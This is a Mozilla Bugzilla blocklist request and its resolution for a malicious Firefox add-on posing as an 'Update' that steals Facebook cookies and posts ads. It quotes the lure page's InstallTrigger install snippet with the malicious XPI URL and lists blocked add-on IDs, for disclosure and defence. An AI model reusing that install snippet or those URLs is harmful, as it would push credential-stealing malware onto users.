Closed Bug 1534103 Opened 6 years ago Closed 6 years ago

Malicious addon "Update" posting on facebook without permission

Categories

(Toolkit :: Blocklist Policy Requests, task)

Product:
Toolkit
Component:
Blocklist Policy Requests
Version:
65 Branch
Type:
task
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED FIXED

People

(Reporter: pascal, Assigned: Fallen)

Details

Attachments

(2 files)

update-2.0-fx.xpi
94.41 KB, application/x-xpinstall
Details
fr-spongebog.funny-ok.com.xpi--install.png
101.27 KB, image/png
Details
Attached file update-2.0-fx.xpi

User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0

Steps to reproduce:

Page
https://osw31.bemobtrk.com/go/5593a1f3-4157-46a8-989c-249d9a924d47?cost=0.000312&visitor_id=120012596437856256&zoneid=2215461&campaignid=1677982

calls

var params = { "EXT_NAME": { URL: "https://informations.to/tsunami/fr/update-2.0-fx.xpi", Hash: "" } };
InstallTrigger.install(params);

with various false information leading to users installing to click to install the addon.

Actual results:

Once installed this small addon will detect facebook logins and post ads.

Expected results:

It should use your facebook account to post content without your permission

Screenshot showing the clickbait.

Addon id : "fr@spongebog.funny-ok.com"

Assignee: nobody → philipp
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true

Hi Pascal, next time, could you use http://bugzilla.mozilla.org/form.blocklist ?

Extension and Platform versions: all
Block Severity: Hard

Reason:

  • Masking as an update to Firefox/Flash/etc
  • Stealing facebook cookies, browsing history, and other information

Here are the guids I will be blocking:

{86c18738-11ed-4c16-af92-786aa036c83c}
{d0fee16a-f4eb-4dc1-9961-82b913e5943d}
{1c4937a1-c678-4607-8665-a16384ee302e}
{22caeb02-38a3-415d-b168-64fadccbb4a4}
{1c9372e7-5f0e-4541-99cf-dfbf2ab00b01}
{9fe66994-8ed1-4317-a20a-1d0544ca062f}
{6df222d8-97c7-42bf-9683-1cf8119c1e9e}
{4c2dda03-bad0-4160-a8a1-6d089200420e}
{7aae7d4f-55b9-42eb-b683-932591265e17}
{e6f8ab99-3c96-410c-95d1-267ad48ed3e2}
{6d8c5068-d0cb-47a5-af5e-3f23064f4608}
{90481f38-d06a-465e-a54c-206bbb1ee9ae}
{4b75aeb8-f14a-4ef3-b1ad-09733b40dac3}
{3a8ca495-f5ab-4320-b070-4f44266fe3d1}
{84f8914f-0dec-48ed-a0fd-4a7712c06793}
{aa613fce-603c-41df-bf49-9b09614cebe6}
{30314350-199a-4951-9c05-c3537a946492}
{a2edce1d-10ab-483d-8c01-5e5fe0c82902}
{ec91a3d4-8311-4700-aa15-b3941f21a052}
{e9049687-164a-4cf3-be1f-1291cfb0f44a}
{2be73925-ebaf-43ca-8b26-bd820887f591}
{840eadea-1c68-411f-b4e9-08d9f236385d}
{0a89d040-5fb1-46d7-bf81-43b55e83695d}
{6a1e76ed-4ac2-4a0c-8beb-43ae63558b36}
{1b90c930-e7d7-486a-9085-8b57129489c7}
{eab649ca-af76-4de9-95b0-8036e35a66cc}
{0628e652-98f4-4e58-9ecb-ad996b061aef}
elfr@geckoaddon.org
else@geckoaddon.org
fr_b@iext.pro
it_b@iext.pro
sv_b@iext.pro
no_b1@iext.pro
fi_b@iext.pro
au_b@iext.pro
elfr12@geckoaddon.org
test@informations.to
se_pop@informations.to
it@spongebog.funny-ok.com
it@tsunami.funny-ok.com
fi@spongebog.funny-ok.com
guid-reused-by-pk-1441180
fi@tsunami.funny-ok.com
no@spongebog.funny-ok.com
no@tsunami.funny-ok.com
fr@tsunami.funny-ok.com
fr@spongebog.funny-ok.com
se@tsunami.funny-ok.com
se@spongebog.funny-ok.com
au@spongebog.funny-ok.com
au@tsunami.funny-ok.com
nz@spongebog.funny-ok.com
nz@tsunami.funny-ok.com
gr@spongebog.funny-ok.com
gr@tsunami.funny-ok.com
nz_fnew@tsunami.funny-ok.com

The block has been staged. Andreas, can you review and push?

Flags: needinfo?(awagner)

Done.

Status: ASSIGNED → RESOLVED
Closed: 6 years ago
Flags: needinfo?(awagner)
Resolution: --- → FIXED
Type: defect → task
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: